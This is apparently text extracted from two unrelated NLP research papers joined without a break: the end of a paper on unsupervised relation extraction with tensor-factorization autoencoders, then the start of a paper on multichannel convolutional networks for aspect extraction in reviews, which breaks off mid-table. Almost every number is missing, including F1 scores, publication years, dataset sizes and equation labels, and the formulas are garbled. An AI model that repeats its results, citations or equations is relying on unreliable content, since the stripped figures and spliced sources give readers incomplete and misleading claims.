influence of the decoder on the model performance, we performed additional ex- periments in a more controlled setting. we reduced the dataset to entity pairs participating in freebase relations, ending up with a total of about , re- lation realizations. we randomly split the dataset in two. we used the first half as a test set te, while we used the second half as a training set tr. we fur- ther randomly split the training set tr in two parts, tr and tr . we use tr as a (distantly) labeled dataset to learn only the decoding part for each pro- posed model. to make it comparable to our unsuper- vised models with induced relations, we trained the decoder on the most frequent freebase re- lations plus a further other relation, which is a union of the remaining less frequent relations. this approach is similar to the kb factorization adopted in bordes et al. ( ). with the decoder learned and fixed, we trained the encoder part on unlabeled examples in tr , while leveraging the previously trained decoder. in other words, we optimize the objective ( ) on tr but update only the encoder parameters w. in this setting the decoder provides a learning signal for the encoder. the better the gen- we also update embeddings of entities not appearing in tr . political organizations universities general organizations figure : t-sne visualization of entity embeddings learned during the training process. eralization properties of the decoder are, the better the resulting encoder should be. we expect more ex- pressive decoders (i.e., rescal and hybrid) to be able to capture relations better than the selectional preference model and, thus, yield better encoders. in order to have a lower bound for the semi-supervised models, we also trained our best model from the pre- vious experiments (hybrid) on tr in a fully unsu- pervised way. all models are tested on the test set te. as expected, all models with a supervised de- coder are much more accurate than the unsuper- vised model (table ). the best results with a supervised decoder are obtained by the rescal model with . % f , while the result of the un- supervised hybrid model is . % f . as expected the rescal and hybrid outperform the selectional preference model in this setting ( . % and . % vs. . % f respectively). somewhat surprisingly, the rescal model is slightly more accurate ( . % f ) than the hybrid model. these experiments con- firm that more accurate decoder models lead to bet- ter performing encoders. the results also hint at a potential extension of our approach to a more real- istic semi-supervised setting, though we leave any serious investigation of this set-up for future work. additional related work in this section, we mainly consider lines of related work not discussed in other sections of the paper, and we emphasize their relationship to our approach. distant supervision. these methods can be re- garded as a half-way point between unsupervised and supervised methods. distantly supervised mod- els are trained on data generated automatically by aligning knowledge bases (e.g., freebase and wikipedia infoboxes) with text (mintz et al., ; riedel et al., ; surdeanu et al., ; zeng et al., ). similarly to our method they can use feature-rich models without the need for manually annotated data. however, a relation extractor trained in this way will only be able to predict relations al- ready present in a knowledge base. these meth- ods cannot be used to discover new relations. the framework we propose is completely unsupervised and does not have this shortcoming. bootstrapping. bootstrapping methods for rela- tion extraction (agichtein and gravano, ; brin, ; batista et al., ) iteratively label new ex- amples by finding the ones which are the most sim- ilar, according to some similarity function, to a seed set of labeled examples. the process continues until some convergence criteria is met. even though this approach is not very labor-intensive (i.e., it requires only few manually labeled examples for the initial seed set), it requires some domain knowledge from the model designer. in contrast, unsupervised mod- els are domain-agnostic and require only unlabeled text. knowledge base factorization. knowledge base completion via matrix or tensor factorization has re- ceived a lot of attention in the past few years (bor- des et al., ; jenatton et al., ; weston et al., ; bordes et al., ; socher et al., ; garcı́a-durán et al., ; bordes et al., ; lin et al., b; chang et al., ; nickel et al., ). but in contrast to what we propose here, namely, in- duction of new relations, these models factorize re- lations already present in knowledge bases. universal schema methods (riedel et al., ) use factorization models to infer facts (e.g., predict missing entities), but they do not attempt to induce relations. in other words, they consider each given context as a relation and induce an embedding for each of them. they do not attempt to induce a clus- tering over the contexts. our work can be regarded as an extension of these methods. autoencoders with discrete states. aside from the work cited above (daumé iii, ; ammar et al., ; titov and khoddam, ; lin et al., a), we are not aware of previous work using autoencoders with discrete states (i.e., a categori- cal latent variable or a graph). the semisupervised version of variational autoencoders (kingma et al., ) used a combination of a real-valued vector and a categorical variable as its hidden representa- tion and yielded impressive results on the mnist image classification task. however, their approach cannot be directly applied to unsupervised classifi- cation, as there is no reason to believe that latent classes would be captured by the categorical vari- able rather than in some way represented by the real- valued vector. the only other application of variational autoen- coders to natural language is the very recent work of bowman et al. ( ). they study language mod- eling with recurrent language models and consider only real-valued vectors as states. generative models with rich features have also been considered in the past (berg-kirkpatrick et al., ). however, autoencoders are potentially more flexible than generative models as they can use very different encoding and decoding components and can be faster to train. conclusions and discussion we presented a new method for unsupervised rela- tion extraction. the model consists of a feature- rich classifier that predicts relations, and a tensor factorization component that relies on the predicted relations to infer left-out arguments. these models are jointly estimated by optimizing the argument re- construction objective. we studied three alternative factorization models building on ideas from knowledge base factoriza- tion and selectional preference modeling. we em- pirically showed that our factorization models yield relation extractors that are more accurate than state- of-the-art generative and agglomerative clustering baselines. as the proposed modeling framework is quite flexible, the model can be extended in many differ- ent ways. our approach can be regarded as learn- ing semantic representations that are informative for basic inference tasks (in our case, the inference task was recovering individual arguments). more general classes of inference tasks can be considered in future work. moreover, it would be interesting to evaluate the proposed model on how accurately it infers these facts (rather than only on the quality of the induced latent representations). the work presented in this paper can also be combined with the approach of titov and khoddam ( ) to induce both relations and semantic roles (i.e., essentially to induce seman- tic frames (fillmore, )). another potential di- rection is the use of labeled data: our feature-rich model (namely its discriminative encoding compo- nent) is likely to have much better asymptotic per- formance than its generative counterpart, and, con- sequently, labeled data should be much more bene- ficial. acknowledgments this work is supported by nwo vidi grant . . , google focused award on natural language understanding and partially supported by isti grant for young mobility. the authors thank github.com/diegma/relation-autoencoder the action editor and the anonymous reviewers for their valuable suggestions and limin yao for an- swering our questions about data and baselines. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in th acm conference on digital libraries. waleed ammar, chris dyer, and noah a. smith. . conditional random field autoencoders for unsuper- vised structured prediction. in nips. sören auer, christian bizer, georgi kobilarov, jens lehmann, richard cyganiak, and zachary g. ives. . dbpedia: a nucleus for a web of open data. in th international semantic web conference (iswc). amit bagga and breck baldwin. . algorithms for scoring coreference chains. in lrec. michele banko and oren etzioni. . the tradeoffs between open and traditional relation extraction. in acl. michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction from the web. in ijcai. david s. batista, bruno martins, and mário j. silva. . semi-supervised bootstrapping of relationship extractors with distributional semantics. in emnlp. taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsu- pervised learning with features. in hlt - naacl. julian besag. . statistical analysis of non-lattice data. the statistician, pages – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . kurt d. bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collabo- ratively created graph database for structuring human knowledge. in sigmod. antoine bordes, jason weston, ronan collobert, and yoshua bengio. . learning structured embed- dings of knowledge bases. in aaai. antoine bordes, nicolas usunier, alberto garcı́a-durán, jason weston, and oksana yakhnenko. . irreflex- ive and hierarchical relations as translations. in struc- tured learning: inferring graphs from structured and unstructured inputs (slg-icml). antoine bordes, xavier glorot, jason weston, and yoshua bengio. . a semantic matching energy function for learning with multi-relational data. jour- nal of machine learning, ( ): – . samuel r. bowman, luke vilnis, oriol vinyals, an- drew m. dai, rafal józefowicz, and samy bengio. . generating sentences from a continuous space. in iclr. sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases workshop (webdb). kai-wei chang, wen-tau yih, bishan yang, and christo- pher meek. . typed tensor decomposition of knowledge bases for relation extraction. in emnlp. hal daumé iii. . unsupervised search-based struc- tured prediction. in icml. oier lopez de lacalle and mirella lapata. . un- supervised relation extraction with general domain knowledge. in emnlp. john c. duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . charles j. fillmore. . frame semantics and the na- ture of language. annals of the new york academy of sciences, ( ): – . jenny rose finkel, trond grenager, and christopher d. manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in acl. kuzman ganchev, joao graca, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . alberto garcı́a-durán, antoine bordes, and nicolas usunier. . effective blending of two and three- way interactions for modeling multi-relational data. in european conference on machine learning and knowledge discovery in databases (ecml-pkdd). lise getoor and ben taskar. . introduction to sta- tistical relational learning. mit press. geoffrey e. hinton. . connectionist learning proce- dures. artificial intelligence, ( - ): – . tommi s. jaakkola and michael i. jordan. . com- puting upper and lower bounds on likelihoods in in- tractable networks. in th annual conference on un- certainty in artificial intelligence (uai). rodolphe jenatton, nicolas le roux, antoine bordes, and guillaume obozinski. . a latent factor model for highly multi-relational data. in nips. diederik p. kingma and max welling. . auto- encoding variational bayes. in iclr. diederik p. kingma, shakir mohamed, danilo jimenez rezende, and max welling. . semi-supervised learning with deep generative models. in nips. tamara g. kolda and brett w. bader. . ten- sor decompositions and applications. siam review, ( ): – . dekang lin and patrick pantel. . dirt - discovery of inference rules from text. in sigkdd. chu-cheng lin, waleed ammar, chris dyer, and lori s. levin. a. unsupervised pos induction with word embeddings. in naacl hlt. yankai lin, zhiyuan liu, huan-bo luan, maosong sun, siwei rao, and song liu. b. modeling relation paths for representation learning of knowledge bases. in emnlp. xitong liu, fei chen, hui fang, and min wang. . exploiting entity relationship for query expansion in enterprise search. information retrieval, ( ): – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in iclr. mike mintz, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction with- out labeled data. in acl. ndapandula nakashole and tom m. mitchell. . mi- cro reading with priors: towards second generation machine readers. in akbc at nips. ndapandula nakashole, gerhard weikum, and fabian m. suchanek. . patty: a taxonomy of relational patterns with semantic types. in emnlp. maximilian nickel, volker tresp, and hans-peter kriegel. . a three-way model for collective learning on multi-relational data. in icml. diarmuid ó séaghdha. . latent variable models of selectional preference. in acl. hoifung poon and pedro m. domingos. . unsuper- vised semantic parsing. in emnlp. deepak ravichandran and eduard h. hovy. . learning surface text patterns for a question answer- ing system. in acl. philip resnik. . selectional preference and sense disambiguation. in acl siglex workshop on tag- ging text with lexical semantics: why, what, and how. sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in ecml-pkdd. sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in naacl. evan sandhaus. . the new york times annotated corpus. linguistic data consortium, philadelphia, ( ). yusuke shinyama and satoshi sekine. . preemp- tive information extraction using unrestricted relation discovery. in naacl hlt. richard socher, danqi chen, christopher d. manning, and andrew y. ng. . reasoning with neural ten- sor networks for knowledge base completion. in nips. fabian m. suchanek, gjergji kasneci, and gerhard weikum. . yago: a core of semantic knowledge. in www. mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in emnlp- conll. ilya sutskever, ruslan salakhutdinov, and joshua b. tenenbaum. . modelling relational data using bayesian clustered tensor factorization. in nips. idan szpektor, hristo tanev, ido dagan, and bonaven- tura coppola. . scaling web-based acquisition of entailment relations. in emnlp. ivan titov and ehsan khoddam. . unsupervised in- duction of semantic roles within a reconstruction-error minimization framework. in naacl. ivan titov and alexandre klementiev. . a bayesian model for unsupervised semantic parsing. in acl. ledyard r. tucker. . some mathematical notes on three-mode factor analysis. psychometrika, ( ): – . tim van de cruys. . a non-negative tensor fac- torization model for selectional preference induction. journal of natural language engineering, ( ): – . laurens van der maaten and geoffrey hinton. . visualizing data using t-sne. journal of machine learning research, ( - ): . pascal vincent, hugo larochelle, yoshua bengio, and pierre-antoine manzagol. . extracting and com- posing robust features with denoising autoencoders. in icml. jason weston, antoine bordes, oksana yakhnenko, and nicolas usunier. . connecting language and knowledge bases with embedding models for relation extraction. in emnlp. limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in emnlp. limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in acl. daojian zeng, kang liu, yubo chen, and jun zhao. . distant supervision for relation extraction via piecewise convolutional neural networks. in emnlp. aspect extraction on user textual reviews using multi-channel convolutional neural network aspect extraction on user textual reviews using multi-channel convolutional neural network aminu da’u , and naomie salim school of computing, faculty of engineering, universiti teknologi malaysia, skudai, johor, malaysia department of otm, hassan usman katsina polytechnic, katsina, nigeria abstract aspect extraction is a subtask of sentiment analysis that deals with identifying opinion targets in an opinionated text. existing approaches to aspect extraction typically rely on using handcrafted features, linear and integrated network architectures. although these methods can achieve good performances, they are time-consuming and often very complicated. in real-life systems, a simple model with competitive results is generally more effective and preferable over complicated models. in this paper, we present a multichannel convolutional neural network for aspect extraction. the model consists of a deep convolutional neural network with two input channels: a word embedding channel which aims to encode semantic information of the words and a part of speech (pos) tag embedding channel to facilitate the sequential tagging process. to get the vector representation of words, we initialized the word embedding channel and the pos channel using pretrained word vec and one-hot-vector of pos tags, respectively. both the word embedding and the pos embedding vectors were fed into the convolutional layer and concatenated to a one-dimensional vector, which is finally pooled and processed using a softmax function for sequence labeling. we finally conducted a series of experiments using four different datasets. the results indicated better performance compared to the baseline models. subjects artificial intelligence, data mining and machine learning, data science keywords aspect extraction, multichannel cnn, aspect extraction, convolutional neural network, deep learning introduction with the growth of textual information on the web, aspect-based sentiment analysis has been widely studied, thereby attracting much attention in the research community. one of the important subtasks of aspect-based sentiment analysis is aspect extraction, which is simply the act of extracting attributes of an entity about which opinions are expressed (liu, ). aspect extraction can generally be performed using either unsupervised (qiu et al., ; wang & wang, ) or supervised methods (lafferty, mccallum & pereira, ; poria, cambria & gelbukh, ; cambria, ). for many years, the state-of-the-art methods of aspect extraction basically depend on the conditional random fields (crf) (lafferty, mccallum & pereira, ), recurrent neural network (rnn) (irsoy & cardie, ), linguistic patterns and syntactic rules (qiu et al., ; how to cite this article da’u a, salim n. . aspect extraction on user textual reviews using multi-channel convolutional neural network. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted april published may corresponding author aminu da’u, dauaminu@graduate.utm.my academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright da’u and salim distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dauaminu@�graduate.�utm.�my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ popescu & etzioni, ). both of these approaches have their own shortcomings. for example, crf is typically linear in nature. thus, it requires a large number of datasets to effectively work. rnns are generally not effective in predicting word labels or phrases that are determined by the context due to their feedback nature. syntactic rules and linguistic patterns need to be handcrafted and their accuracy generally depends on the grammatical accuracy of the sentences. to address the aforementioned issues among others, few approaches have been proposed to exploit deep convolutional neural network (cnn) architectures to improve the performance of the aspect extraction models (poria, cambria & gelbukh, ; xu et al., a). these models do not usually require predefined features to be manually handpicked; instead, they can automatically learn sophisticated features from their datasets. generally, words are usually represented in the form of a vector and the extraction of the feature is left to the network. consequently, words with similar semantics can be mapped using these models to nearby locations in their coordinate systems. even though these approaches have shown better performances than their prior approaches, however, there are some important issues worth to be considered for further improvement: first, most of the existing approaches typically used only general pretrained word embeddings such as google word vec or glove embeddings as the main semantic feature for the aspect extraction, although word embeddings have shown effectiveness in capturing both syntactic and semantic information of words. however, in some cases, due to the distributional hypothesis, word embeddings alone fail to efficiently capture the syntactic information of some aspect terms, for example, in the latent space, bad and good are typically mapped together as neighbors while analyzing these words is very critical in aspect classification. moreover, due to the complexity of the aspect extraction task, fine-grained embeddings are particularly important to achieve a better performance (yin et al., ). therefore, we urge that using a domain-specific embedding is very crucial for information extraction performance. thus, in this paper, we exploited both the general and domain-specific embeddings to examine which embeddings are superior over the other. additionally, most of the previous cnn based aspect extraction models are either stacked (ye, yan & luo, ) or integrated with other models such as long short term memory (lstm) (dong, zhang & yang, ). these consequently increase the complexity of the model parameters. although these may improve the model performance, according to blumer et al. ( ), in real-world applications, a simple model is always preferred and more useful over the complicated model. this is particularly important when a model is used for a real-life situation such as chatbot in which a complex model will retard the inferential performance of the model. thus, achieving a competitive performance while ensuring a simple architecture without manually crafting features and much complexity is always a crucial direction to explore. this paper proposes to achieve such a goal. motivated by the above-mentioned issues, this paper proposes an aspect extraction model based on an multichannel convolutional neural network (mcnn) leveraging two different embedding layers: word embedding and part of speech (pos) tag embedding layer. to achieve a simple architecture while ensuring a competitive performance, da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we propose a purely cnn model for sequential labeling. a cnn model which is nonlinear network architecture can fit data more easily with relatively few parameters. the major contributions of the proposed model can be summarized as follows: . we introduced an mcnn model for aspect extraction leveraging two different input channels: word embeddings and pos tag embeddings channel to encode the contextual information and enhance sequential tagging of words, respectively. . we investigated the importance of using domain-specific embeddings over the general-purpose word embeddings in aspect extraction. . we conducted a series of experiments on the semeval challenge datasets (pontiki & pavlopoulos, ; maria et al., ; hercig et al., ) and showed that our approach outperformed the baseline methods with significant gains across all the datasets. the remainder of the paper is arranged as follows. in sections, “related work”, “the proposed model”, “experimental study”, “results and discussion” and “conclusion and future direction”. related work aspect extraction as the subtask of aspect-based sentiment analysis has been widely studied by many researchers. one of the earliest studies was conducted by hu & liu ( ) to propose a rule-based method for the explicit aspect categorization. this method was later improved by many approaches among which include the work of popescu & etzioni ( ) who used point-wise mutual information between the product class and noun phrase for product feature extraction. generally, aspect extraction can be performed using either unsupervised (qiu et al., ; wang & wang, ; popescu & etzioni, ; chen, mukherjee & liu, ) or supervised method (lafferty, mccallum & pereira, ; poria, cambria & gelbukh, ; cambria, ). our proposed work particularly focuses on the supervised methods which treat aspect extraction task as a sequence labeling problem. the traditional supervised methods are mainly based on hidden marcok model (jin & ho, ) and crf (lafferty, mccallum & pereira, ). with the recent success of deep learning in different areas such as image classification and pattern recognition, several approaches have been proposed to exploit deep learning methods for the aspect extraction. for instance, wang et al. ( ) employed a restricted boltzmann machine model to jointly address the problem of sentiment–aspect extraction. irsoy & cardie ( ) utilized rnn and demonstrated its superior performance over the crf-based models for aspect extraction. this method was later improved by pengfei, shafiq & helen ( ). they applied more sophisticated variants of the rnn using fine-tuned word vectors and additional linguistic features for better improvement. to tag each word with non-aspect or aspect label, a multilayer cnn was proposed by poria, cambria & gelbukh ( ). the authors used syntactic and linguistic patterns to improve the accuracy of the model. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for further improvement, the attention-based model has been used for aspect extraction to learn the representation of the informative words in text review (chen et al., ; wang, pan & dahlmeier, ; maria et al., ; hercig et al., ). tree-based methods have been shown effective for improving the performance of the aspect extraction model. for instance, yin et al. ( ) introduced a dependency path approach in which both the dependency and linear contextual information are considered for the word representation. a similar method was proposed by wang et al. ( ) to exploit dependency tree and crf for better coextraction of aspect and opinion terms. xu et al. ( ) and li & lam ( ) also exploited deep learning for coextraction of the aspect and opinion terms. recently, a tree-based cnn was introduced by ye, yan & luo ( ). they applied tree-based convolution over a sentence dependency parse tree. luo et al. ( ) proposed an end-to-end method to integrate bilstm, crf and word embeddings for aspect term extraction. our approach is closely related to the work of xu et al. ( b) in which a double embeddings method has been used to model aspect extraction using two different in-domain word embeddings. however, this method has a drawback in that it solely relies on the word embedding as the main feature and ignore to utilize the pos tag for the sequential tagging. in our approach, pos tags features are utilized in addition to the word embedding features to improve the model performance. furthermore, unlike the previous methods, we specifically used two different channels as the input to the convolutional network architecture. we used both general and domain-specific embedding in the first channel specifically to capture the syntactic and semantic information of the word, and pos tag embedding in the second channel to specifically improve the sequential labeling of the aspects. to the best of our knowledge, this is the first work to use a mcnn architecture leveraging both word embeddings and pos tag embeddings in different channels for better performance of the aspect extraction model. our model figure illustrates the proposed mcnn architecture. the model is based on the cnn structure proposed in kim ( ). specifically, the proposed model is made up of two input layers: word embedding and pos embedding layer. it consists of two convolutional layers followed by a max pooling layer, rectified linear unit optimizer, a fully connected layer, and a softmax classifier to predict the multiclass labels of the aspects with labelling space, y = {b, i, o} with “i”, “o” and “b” representing inside, outside or beginning of the aspect term, respectively. detail of the model is described in the following subsections: input channels the model typically comprises two sets of vectors, each of which is an input channel to the network (kim, ). for the word embedding channel, the main idea is to capture the semantic information of the words. for that, we use both general and domain-specific embeddings. use this correction: for the general embedding, we used a pretrained word embedding trained on billion words of google corpus (mikolov, yih & zweig, ), while for the domain-specific embedding, we specifically used a cbow (continuous da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bag of words) architecture trained on amazon and yelp reviews for the laptop and restaurant domain, respectively. in this case, each word was encoded as -dimensional vectors. we use word padding to make sure that all sentences are of the same length. to capture the contextual features of the words, ith words are mapped to a k-dimensional embedding. the semantic feature of a sentence of length n is given as jxjn ¼ fx . . . . . . ; xng, x ∈ rk. for the pos tag embeddings, the main idea is to improve the aspect extraction process based on the pos tagging. specifically, we employ one hot vector in which each tag is transformed into a k-dimensional vector. similar to (jebbara & cimiano, ), we use a stanford pos tagger with tags. these are encoded as -dimensional vector and represented as a matrix. this can be represented as: jsjn ¼ fs . . . . . . ; sng, ∈ r . convolutional layer after all the textual information is encoded into vectors and zero padding is applied to make all the embedding channels of the same length, the convolution operations are then applied to generate local features. thus, the main purpose of the convolutional layer is to extract local features from the embedding layer. here, we use two different filter sizes for pos feature p and semantic feature z accordingly. typically, convolution is a dot product involving filters with weights w ∈ rhk and a vector of h-gram in a sentence (kim, ). user textual reviews word embedding channel pos tag channel convolu�onal layer with feature maps pooling layer output layer aspect categoriza�on figure overview of the mcnn architecture. full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ let wp ∈ r hk and wz ∈ r hk be filter applied to h-gram for the matrix p and matrix z, respectively. then the features generated can be given as: ci ¼ f ðw � xiþh þ bÞ ( ) where f is a nonlinear function (such as hyperbolic tangent or relu), b stands for a bias term. this is applied to each window, [x :h, x :h+ , : : : xn-h :n,]. with the wp ∈ r n-k+ and wz ∈ r n-k+ , for the matrix p and matrix z, respectively. the features generated for p is given by: cp ¼ ½cp ; cp . . . :cpn�hþ � ( ) and similarly, the feature map for matrix z, is given as cz ¼ ½cz ; cz . . . :czn�hþ � ( ) however, it is worth to mention that, different semantic and pos features can be extracted using several filters. max pooling layer pooling operation is basically aimed to reduce the feature resolution maps by applying a pooling function to several units in a local region of a size based on a parameter known as pooling size. the pooling operation generally serves as generalizations over the features captured from the convolutional operation. thus, the basic idea behind utilizing max poling layer is to extract the most salient features from the convolutional layer. typically, pooling layer takes the maximum element in each generated feature map. this can be given as: cp _ ¼ max½cp ; cp . . . :cpn�hþ � and cz _ ¼ max½cz ; cz . . . :c p n�hþ � for p and z, respectively. when the max pooling is applied, the final maximum feature is generated by concatenating the semantic and pos features using a filter. this can be given as c ¼ cp _ � cz _ . where is the concatenation operator. as we use several features for the pos and semantic features, we have the final feature as: c ¼ c p _ � . . . :: � cnp _ � cmz _ � . . . :: � cmz _ ( ) where n and m are the filters for semantic and pos features, respectively. output layer here, we finally apply the softmax classifier to generate the probability distribution over given aspects. the main idea of the softmax function is to carry out a classification process over the high-level features generated from the convolution operation and pooling layers. in this case, the softmax function is used to find the probability distribution for all the output labels. here, we specifically treat the aspect extraction as a sequence labeling process. particularly we apply iob scheme to indicate our aspect annotations as a tag da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sequence. each word in the text is assigned with one of the three tags: i, o or b indicating beginning, inside or outside of an aspect term, respectively. model variations in order to evaluate our model, we conducted a series of experiments with different settings of the model. � mcnn-random: to assess the impacts of word embeddings, the word embedding channel is randomly initialized while the input channel containing the pos tag embeddings is ignored, meaning that only the randomized word embeddings channel is considered for training. � mcnn+w v: here, the word embedding layer is initialized with a pretrained word vec and optimized during training. in particular we used general purpose word embeddings trained on the google corpus (mikolov, yih & zweig, ). � mcnn+w v : this is similar to the mcnn+w v setting; however, instead of using the general pretrained word embedding, we used a domain-specific word vec trained on either amazon or yelp review datasets. this is specifically aimed to assess the impacts of the domain-specific word embeddings compared to the general word embeddings. � mcnn+w v+pos: in this case, all the two input channels are considered for the training and optimization process. specifically, we used the general word embeddings in one channel and pos tag embeddings in the other channel. however, the model parameters were fine-tuned during optimization � mcnn+w v +pos: this is similar to mcnn-w v+pos variant; however, in this case, instead of applying a general pretrained word vec, a domain-specific word embedding was used. all the parameters were fine-tuned. experimental study in this section, we first present a description of the datasets used, then provide a detailed experimental procedure for evaluating the performance of the proposed approach and finally make a comparison against the baseline methods. we use recall, precision and f score as the evaluation metrics to evaluate the performance of the model. these metrics have been previously used in several relevant works (poria, cambria & gelbukh, ; popescu & etzioni, ). dataset to evaluate the performance of the model, we utilized four different benchmark datasets. the datasets which comprise training and test snippets were collected manually and made available by the organizers for the semeval competitions. the first two datasets are from semeval (pontiki & pavlopoulos, ) comprising reviews from laptop and restaurant domains, respectively, while the third and fourth datasets are from semeval (maria et al., ) and semeval (hercig et al., ), respectively containing reviews from restaurant domain. these datasets comprise review sentences with aspect da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ terms labelled as spans of characters. tables and show the statistics of the datasets and a typical example of the aspect terms distribution of the laptop and restaurant domains, respectively. in order to initialize the word vectors, we particularly exploit two different word embeddings: ( ) general embeddings in which we use pretrained google word vec trained on billion words of google news corpus (mikolov, yih & zweig, ) using cbow architecture; ( ) domain-specific embeddings trained on the restaurant review from the yelp datasets, and electronics reviews from the amazon datasets, for the restaurant and the laptop domains, respectively. the yelp (https://www.yelp.com/dataset/) and amazon (mcauley & leskovec, ) review datasets contain . million and . million reviews, respectively. we use gensim which has the implementation of cbow to train all the datasets. words that appear less than five times in the review are replaced with <other> token. preprocessing we carry out preprocessing with the aim of obtaining a clean and structured textual review. specifically, we convert all the reviews into lower case comprised of only english texts and split the text into separate sentences. we apply noise removal strategy which includes removal of words with special characters, stop words, alphanumeric characters and words that have a length less than or equal to . experimental setup we use fivefolds cross-validation strategy to choose the hyperparameters. specifically, we choose three filter size of ( , , ), with feature maps. we used a max pooling layer table semeval challenge datasets showing the number of sentences and the aspect terms. datasets train test sentence aspect sentence aspect semeval -l semeval -r semeval -r semeval -r note: l and r represent the laptop and restaurant domains, respectively. table examples of aspect and aspect terms word distribution in the laptop and restaurant domains. domain aspect aspect terms laptop price price, regret, deal, money, store, stars, gift, penny, worth warranty warranty, center, policy, support, repair, service, extended, longer, contact design exterior, wheels, plastic, wheel, design, interior, wheels, clean, good restaurant service manager, owner, staff, workers, employees, messenger, chefs, cleaner food crispy, tender, chicken, beef, shrimp, curry, tuna, egg, onions ambience setting, décor, lighting, wall, elegant, cool, nice, trendy da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / https://www.yelp.com/dataset/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after each convolutional layer. as we wanted to tag each word, we use as the stride for each convolutional layer. to tackle the issue of the parameter overfitting, we utilized drop out regularization on the penultimate layer with l constraints of . the training is conducted using stochastic gradient descendent over shuffled mini batches of size and a dropout rate of . . we apply relu for all the datasets and used to be the size of the hidden rate. these values were chosen based on the careful grid search on the validation subset. to better assess the performance of the proposed model, we first identify the best performing settings of the model (as described in section e) and then make a further comparison with the following baselines models: � dlirec (toh & wang, ): the winning system in the semeval competition (subtask ) which employ a variety of lexical and semantic features derived from nlp source to improve the performance of the model. � ihsr & d (chernyshevich, ): another top winning system in the semeval competition which typically exploits crf and additional features including lexical and statistical features for improving the performance. � nlangp (toh & su, ): the top system for semeval challenge for the restaurant domain. � wdemb (yin et al., ): a dependency-based approach integrated crf with path embedding for aspect term extraction. � rncrf (wang et al., ): this model jointly uses crf and a dependency-based recursive neural network for coextracting aspects and opinion terms. the method also exploits additional handcrafted features. � cmla (wang, pan & dahlmeier, ): a multilayer coupled-attention model for opinion and aspect terms coextraction. � min (li & lam, ): a multitask learning approach that exploits lexicons and dependency rules to jointly perform coextraction of aspect terms and opinion terms. it uses two different lstms for the polarity classification of sentences. � dtbcsnn (ye, yan & luo, ): a dependency tree based convolutional stacked neural network which used the inference layer for aspect extraction. � de-cnn (xu et al., b): a cnn based model exploiting double embeddings for aspect extraction. � bidtreecrf (luo et al., ): a tree-based deep learning approach which uses bidirectional lstm and the crf layer for improving aspect extraction. results and discussion table shows the results of the proposed model compared to the baseline models. here, the results of the best two settings of the model were recorded for each dataset. it can be shown that the best performing variants of the proposed model significantly outperform the state of art approaches. the statistical t-test shows the improvement is significant at the confidence level of %. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compared to the best-performing systems in the semeval competitions, our model performs better than his_rd and dlirec with gains of . %, . % and . %, . % f score on the semeval -l and semeval -r datasets, respectively. similarly, our approach also achieves significant gains against nlangp by . % and . % f score on the semeval -r and semeval -r, respectively. it can be observed that even the wdemb approach which exploits word dependency with additional embedding, still our model achieved significant gains compared to the model across all the datasets. one can also notice from table that, our model outperforms min which is a multitasking approach, with a gain of . %, . %, . % and . % f score on the semeval -l, semeval -r, semeval -r and semeval -r datasets, respectively. our model also outperforms cmla which is a multilayer approach by . % f score on the semeval -l datasets. despite exploiting the additional handcrafted features by rncr+f and dtbcsnn, still, our approach achieves . %, . % and . %, . % f score gains over the two approaches on the semeval -l and semeval- -r datasets, respectively. moreover, our model outperforms the recent tree-base bidirectional method, bidtreecrf by . %, . %, . % and . % f score on the semeval -l, semeval -r, semeval -r and semeval -r datasets, respectively. compared to the double embedding cnn approach, de-cnn which is the state-of-the-art double embedding approach, our model suffered a low performance on the semeval -l, however, it manages to achieve a gain of . % f score on the semeval -r datasets. this apparently shows the superior performance of our model over the de-cnn model. it can be observed from table , that different settings of the model have different performances across the four different datasets. mcnn-wv -pos performs better than all the other variants across all the datasets while the mcnn-random records relatively lowest performance except on the semeval -r where the mcnn-wv -pos records table comparison results of our best performing model variants in terms of f scores (%) with the state-of-the-art methods. model semeval -l semeval -r semeval -r semeval -r his_rd . . – – nlangp – – . . dlirec 